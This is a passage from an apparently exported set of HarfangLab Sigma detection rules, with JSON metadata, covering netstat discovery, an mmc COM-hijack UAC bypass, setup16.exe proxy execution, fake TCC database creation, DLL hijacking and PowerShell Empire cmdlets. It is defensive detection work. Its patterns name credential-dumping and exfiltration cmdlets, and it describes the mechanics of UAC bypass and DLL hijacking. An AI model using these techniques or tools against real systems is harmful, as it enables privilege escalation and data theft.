"https://attack.mitre.org/software/S0104/"
],
"name": "t1049_netstat_windows.yml",
"content": "title: Network Statistics Discovered via Netstat (Windows)\nid: e90145a1-9e20-4937-ad01-c8777f3af8c6\ndescription: |\n Detects the execution of netstat.exe, a tool often used by attackers to gather detailed information about a computer's network connections.\n Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\n It is recommended to analyze the process responsible for the execution of netstat as well as to look for other malicious actions on the host.\nreferences:\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2021/05/17\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0104\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\netstat.exe'\n # Renamed binaries\n - OriginalFileName: 'netstat.exe'\n\n selection_commandline:\n CommandLine:\n - 'netstat'\n - 'netstat -a'\n - 'netstat -f'\n - 'netstat -r'\n - 'netstat -??'\n - 'netstat -???'\n - 'netstat -???? tcp'\n - 'netstat.exe'\n - 'netstat.exe -a'\n - 'netstat.exe -f'\n - 'netstat.exe -r'\n - 'netstat.exe -??'\n - 'netstat.exe -???'\n - 'netstat.exe -???? 
tcp'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_commandline:\n ParentCommandLine|startswith:\n - '?:\\WINDOWS\\system32\\cmd.exe /d /s /c netstat '\n - 'cmd* /c netstat -*|*find '\n - 'cmd* /c netstat -*|*findstr '\n - '?:\\WINDOWS\\system32\\cmd.exe /c netstat -*|*find '\n - '?:\\WINDOWS\\system32\\cmd.exe /c netstat -*|*findstr '\n\n exclusion_webex:\n # Cisco Webex\n ParentImage|endswith: '\\webexmta.exe'\n GrandparentImage|endswith:\n - '\\atmgr.exe'\n - '\\ptoneclk.exe'\n\n exclusion_vagrant:\n GrandparentImage: '?:\\HashiCorp\\Vagrant\\bin\\vagrant.exe'\n ParentImage|endswith: '?:\\HashiCorp\\Vagrant\\embedded\\mingw64\\bin\\ruby.exe'\n\n exclusion_commvault_diagnostics:\n GrandparentImage|endswith: '\\CvDiagnostics.exe'\n\n exclusion_parent:\n - ParentImage:\n - '?:\\WindowsAzure\\GuestAgent_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\Packages\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\SAP\\scc20\\SCCHost.exe'\n - '?:\\oracle\\product\\\\*\\agent\\agent_*\\perl\\bin\\perl.exe'\n - ParentCommandLine:\n - 
'?:\\windows\\system32\\cscript.exe *\\manageengine\\opmanager\\appmanager\\working\\conf\\application\\scripts\\diagnostics\\selfmonitor.vbs *'\n - '*\\safeq6\\spoc\\terminalserver\\terminalserver.exe -displayname ysoft *'\n - '?:\\Windows\\System32\\cmd.exe /c ?:\\Windows\\System32\\netstat.exe -ano > ?:\\Windows\\TEMP\\nessus_*.TMP & ren ?:\\Windows\\TEMP\\nessus_*.TMP nessus_*.TXT'\n\n exclusion_grandparent:\n - GrandparentImage:\n - '*\\mon-assistant-marche-public\\Mon Assistant Marchés Publics.exe'\n - '*\\mon-assistant-marche-public-ecole\\Mon Assistant Marchés Publics ECOLE.exe'\n - '*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n - '*\\AppData\\Roaming\\ACEStream\\engine\\ace_engine.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Fleet\\Fleet.exe'\n - '*\\Ankama Launcher\\Ankama Launcher.exe'\n - '?:\\Tenable\\Tenable.ad\\Tools\\nssm.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n - GrandparentCommandLine:\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\Program Files\\Siemens\\syngo\\OperationalManagement\\HealthCheck\\\\*.bat'\n - '*\\FileMaker\\FileMaker Server\\Admin\\FAC\\facstart.sh'\n - '?:\\Windows\\system32\\cmd.exe /c *\\Semantic\\Easily.Semantic.Solr\\bin\\solr.cmd status'\n - 'php */Kiamo*/bin/modules/resources/scheduler/netstat/netstat_tcp.php'\n - 'php resources\\scheduler\\netstat\\netstat_tcp.php'\n - '?:\\WINDOWS\\system32\\cmd.exe /c *\\solr-?.?.?\\bin\\Solr_New.bat'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\APPLIS\\EASILY\\SERVICE_SEM\\Semantic\\Easily.Semantic.Solr\\bin\\solr.cmd *'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\F5 VPN\\f5fpclientW.exe'\n - '?:\\Program Files (x86)\\Talend-Studio\\studio\\Talend-Studio-win-x86_64.exe'\n - '?:\\Windows\\ADDMRemQuery_x86_64_v2.exe'\n - '?:\\ProgramData\\KMSAutoS\\KMSAuto Net.exe'\n - '\\Start_Programs\\Windows_i386-32\\acslaunch_win-32.exe'\n - '\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '\\DSS\\DSS Server\\VMS 
Service\\VMS_Service.exe|?:\\Windows\\System32\\services.exe'\n - '\\SER\\Doxis\\DoxisOrgaTransmitter*\\OrgaTransmitter.exe'\n - '?:\\Program Files\\Veritas\\NetBackup\\bin\\support\\nbsu.exe'\n - '?:\\Program Files\\totalcmd\\TOTALCMD64.EXE'\n - '\\SASHome\\SASStudioSingleUser\\\\*\\SASStudioHost.exe'\n\n exclusion_openview:\n CommandLine: 'netstat -rnv'\n ParentCommandLine: 'cmd /c netstat -rnv'\n CurrentDirectory: '?:\\Program Files\\HP OpenView\\Data\\bin\\instrumentation'\n\n exclusion_stratoprobe:\n ParentCommandLine: 'cmd /c ?:\\temp\\StratoProbe\\\\????????????????????????????????\\stratoStat.bat'\n\n exclusion_examshield:\n CommandLine: 'netstat -ano'\n ParentCommandLine: 'cmd.exe /C netstat -ano'\n GrandparentImage|endswith: '\\ExamShield.exe'\n\n exclusion_oracle_agent:\n ParentCommandLine|contains:\n - '\\virtual\\agent12c\\core\\\\*\\perl\\bin\\perl *\\virtual\\agent12c\\core\\\\*/sysman/'\n - '\\agent_*\\perl\\bin\\perl ?:\\\\*\\agent_*/sysman/admin/scripts/openports.pl'\n - '\\agent_*\\perl\\bin\\perl ?:\\\\*\\agent_*/sysman/admin/scripts/insecureservices.pl'\n\n exclusion_arcgiswebappbuilder:\n CurrentDirectory|endswith: '\\arcgis-web-appbuilder-*\\ArcGISWebAppBuilder\\server\\'\n GrandparentCommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c *\\arcgis-web-appbuilder-*\\ArcGISWebAppBuilder\\startup.bat'\n\n exclusion_dicomlistener:\n ParentImage|endswith: '\\XnDicomListener\\XnDicomListener.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_netstat:\n # netstat -r\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\system32\\route.exe print'\n\n exclusion_oracle:\n CommandLine: 'netstat -an'\n ParentImage:\n - '?:\\Oracle\\\\*\\bin\\perl.exe'\n - '?:\\\\*\\perl\\bin\\perl.exe'\n - '*\\bin\\MSWin32-x86\\perl.exe'\n GrandparentImage:\n - '*\\BIN\\emagent.exe'\n - '*/bin/emagent'\n\n exclusion_semantic:\n CommandLine|contains: '\\Semantic\\Easily.Semantic.Solr\\bin\\solr.cmd'\n\n exclusion_kiamo:\n 
GrandparentImage:\n - '?:\\Kiamo*\\bin\\third_packages\\PHP\\php.exe'\n - '?:\\Kiamo*\\bin\\third_packages\\PHP?\\php.exe'\n\n exclusion_git:\n ParentImage:\n - '*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n - '*\\AppData\\Local\\Programs\\Git\\usr\\bin\\sh.exe'\n\n exclusion_vmware:\n # get-versions.bat\n ProcessAncestors|contains: '\\cmd.exe|?:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe|'\n\n exclusion_pulse:\n ParentImage|endswith: '\\AppData\\Roaming\\Pulse Secure\\Host Checker\\dsHostChecker.exe'\n\n exclusion_mobaxterm:\n ParentImage: '?:\\Users\\\\*\\Documents\\MobaXterm\\slash\\bin\\bash.exe'\n\n exclusion_perl:\n - ParentImage: '?:\\Perl64\\bin\\perl.exe'\n - GrandparentImage: '?:\\Perl64\\bin\\perl.exe'\n\n exclusion_servicenow:\n ParentCommandLine: 'cmd /c netstat.exe -ano > \\\\\\\\127.0.0.1\\admin$\\temp\\psscript_output_*.txt 2>\\\\\\\\127.0.0.1\\admin$\\temp\\psscript_err_*.txt'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e90145a1-9e20-4937-ad01-c8777f3af8c6",
"rule_name": "Network Statistics Discovered via Netstat (Windows)",
"rule_description": "Detects the execution of netstat.exe, a tool often used by attackers to gather detailed information about a computer's network connections.\nAdversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nIt is recommended to analyze the process responsible for the execution of netstat as well as to look for other malicious actions on the host.\n",
"rule_creation_date": "2021-05-17",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e90e9976-8766-40f2-ad94-ebd9bc6788da",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077381Z",
"creation_date": "2026-03-23T11:45:34.077383Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077387Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/"
],
"name": "t1548_002_prepare_uac_bypass_mmc_comhijack.yml",
"content": "title: Mmc UAC Bypass Prepared\nid: e90e9976-8766-40f2-ad94-ebd9bc6788da\ndescription: |\n Detects preparation of UAC bypass via \"mmc.exe\" by using the @{0A29FF9E-7F9C-4437-8B11-F424491E3931} CLSID (NDP SymBinder).\n By hijacking the \"Server\" registry value for this COM class, it is possible to make \"mmc.exe\" load an arbitrary DLL with high integrity.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry change to look for malicious content or actions.\nreferences:\n - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\ndate: 2020/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'CreateKey'\n TargetObject: 'HKU\\\\*\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\Server'\n\n exclusion_devenv:\n Image|endswith: '\\devenv.exe' # c:\\program files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\devenv.exe\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e90e9976-8766-40f2-ad94-ebd9bc6788da",
"rule_name": "Mmc UAC Bypass Prepared",
"rule_description": "Detects preparation of UAC bypass via \"mmc.exe\" by using the @{0A29FF9E-7F9C-4437-8B11-F424491E3931} CLSID (NDP SymBinder).\nBy hijacking the \"Server\" registry value for this COM class, it is possible to make \"mmc.exe\" load an arbitrary DLL with high integrity.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry change to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-26",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e91f013a-c074-4ab7-afd2-740f004c0caf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609031Z",
"creation_date": "2026-03-23T11:45:34.609035Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609042Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/",
"https://x.com/Hexacorn/status/1845212255891120452",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_suspicious_execution_setup16.yml",
"content": "title: Suspicious Execution via setup16.exe\nid: e91f013a-c074-4ab7-afd2-740f004c0caf\ndescription: |\n Detects the execution of an LST file through 'setup16.exe'.\n 'setup16.exe' is an old Windows binary that can be used for customized installations, taking an LST file as input which defines setup fields.\n The LST file can define different fields which could be abused by malicious actors for execution.\n It is recommended to review the execution context of 'setup16.exe' and to investigate its child process(es).\nreferences:\n - https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/\n - https://x.com/Hexacorn/status/1845212255891120452\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2024/10/14\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\setup16.exe'\n ProcessParentOriginalFileName: 'setup16.exe'\n\n filter_acmsetup:\n Image|endswith: '\\acmsetup.exe'\n CommandLine|contains|all:\n - 'acmsetup'\n - ' /t '\n - ' /s '\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e91f013a-c074-4ab7-afd2-740f004c0caf",
"rule_name": "Suspicious Execution via setup16.exe",
"rule_description": "Detects the execution of an LST file through 'setup16.exe'.\n'setup16.exe' is an old Windows binary that can be used for customized installations, taking an LST file as input which defines setup fields.\nThe LST file can define different fields which could be abused by malicious actors for execution.\nIt is recommended to review the execution context of 'setup16.exe' and to investigate its child process(es).\n",
"rule_creation_date": "2024-10-14",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9311458-4875-4c6f-b493-0592de1251b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095754Z",
"creation_date": "2026-03-23T11:45:34.095756Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095760Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/inital-research-of-jokerspy",
"https://attack.mitre.org/techniques/T1548/006/"
],
"name": "t1548_006_susp_tcc_database_created.yml",
"content": "title: Suspicious TCC Database File Created\nid: e9311458-4875-4c6f-b493-0592de1251b1\ndescription: |\n Detects a suspicious creation of the Transparency, Consent, & Control (TCC) database in a non-standard folder.\n Adversaries may create a fake TCC database while exploiting vulnerabilities to bypass TCC restrictions and execute malicious content with privileged access.\n It is recommended to check if the process creating the database has legitimate reasons to do so.\nreferences:\n - https://www.elastic.co/security-labs/inital-research-of-jokerspy\n - https://attack.mitre.org/techniques/T1548/006/\ndate: 2024/07/22\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.006\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_create:\n Kind: 'create'\n Path|endswith: '/TCC.db'\n ProcessImage|contains: '?'\n\n filter_files:\n # /Library/Application Support/com.apple.TCC/TCC.db\n # ~/Library/Application Support/com.apple.TCC/TCC.db\n - Path|endswith: '/Library/Application Support/com.apple.TCC/TCC.db'\n - TargetPath|endswith: '/Library/Application Support/com.apple.TCC/TCC.db'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9311458-4875-4c6f-b493-0592de1251b1",
"rule_name": "Suspicious TCC Database File Created",
"rule_description": "Detects a suspicious creation of the Transparency, Consent, & Control (TCC) database in a non-standard folder.\nAdversaries may create a fake TCC database while exploiting vulnerabilities to bypass TCC restrictions and execute malicious content with privileged access.\nIt is recommended to check if the process creating the database has legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e93663a6-76e2-4f02-a8c1-5b3319ff5693",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086806Z",
"creation_date": "2026-03-23T11:45:34.086808Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086813Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_immersivetpmvscmgrsvr.yml",
"content": "title: DLL Hijacking via immersivetpmvscmgrsvr.exe\nid: e93663a6-76e2-4f02-a8c1-5b3319ff5693\ndescription: |\n Detects potential Windows DLL Hijacking via immersivetpmvscmgrsvr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'immersivetpmvscmgrsvr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\profapi.dll'\n - '\\winscard.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e93663a6-76e2-4f02-a8c1-5b3319ff5693",
"rule_name": "DLL Hijacking via immersivetpmvscmgrsvr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via immersivetpmvscmgrsvr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e95e0452-fb72-4d16-ba86-5c75984a02b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595865Z",
"creation_date": "2026-03-23T11:45:34.595888Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595896Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Inveigh",
"https://gist.github.com/monoxgas/9d238accd969550136db",
"https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1",
"https://github.com/secmode/Invoke-Apex",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_empire_script.yml",
"content": "title: Malicious PowerShell Empire Commandlets\nid: e95e0452-fb72-4d16-ba86-5c75984a02b2\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Empire framework.\n Attackers may use the PowerShell Empire framework for executing post-exploitation tasks, such as privilege escalation, persistence, credential harvesting, and lateral movement within a compromised network.\n It is recommended to immediately investigate actions performed via PowerShell and other suspicious actions on the host to determine whether they are the result of an ongoing security audit or an active attacker.\nreferences:\n - https://github.com/Kevin-Robertson/Inveigh\n - https://gist.github.com/monoxgas/9d238accd969550136db\n - https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1\n - https://github.com/secmode/Invoke-Apex\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Framework.Empire\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Get-FoxDump'\n - 'Get-Screenshot'\n - 'Invoke-NetRipper'\n - 'Invoke-EgressCheck'\n - 'Invoke-PostExfil'\n - 'Invoke-PSInject'\n - 'New-HoneyHash'\n - 'Invoke-PowerDump'\n - 'Exploit-Jboss'\n - 'Invoke-Paranoia'\n - 'Invoke-WinEnum'\n - 'Invoke-ARPScan'\n - 'Invoke-BackdoorLNK'\n - 'Invoke-BypassUAC'\n - 'Invoke-Tater'\n\n exclusion_signageos:\n # Get-ScreenshotHelper.ps1 + Get-Screenshot.ps1\n ProcessCommandLine: '*\\signageos\\server\\powershell\\Get-Screenshot*.ps1 -screenshotFilePath *\\signageOS\\fileSystem\\tmp\\screenshots\\\\*.png'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e95e0452-fb72-4d16-ba86-5c75984a02b2",
"rule_name": "Malicious PowerShell Empire Commandlets",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Empire framework.\nAttackers may use the PowerShell Empire framework for executing post-exploitation tasks, such as privilege escalation, persistence, credential harvesting, and lateral movement within a compromised network.\nIt is recommended to immediately investigate actions performed via PowerShell and other suspicious actions on the host to determine whether they are the result of an ongoing security audit or an active attacker.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e95e0452-fb72-4d16-c2c6-5c75984af301",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
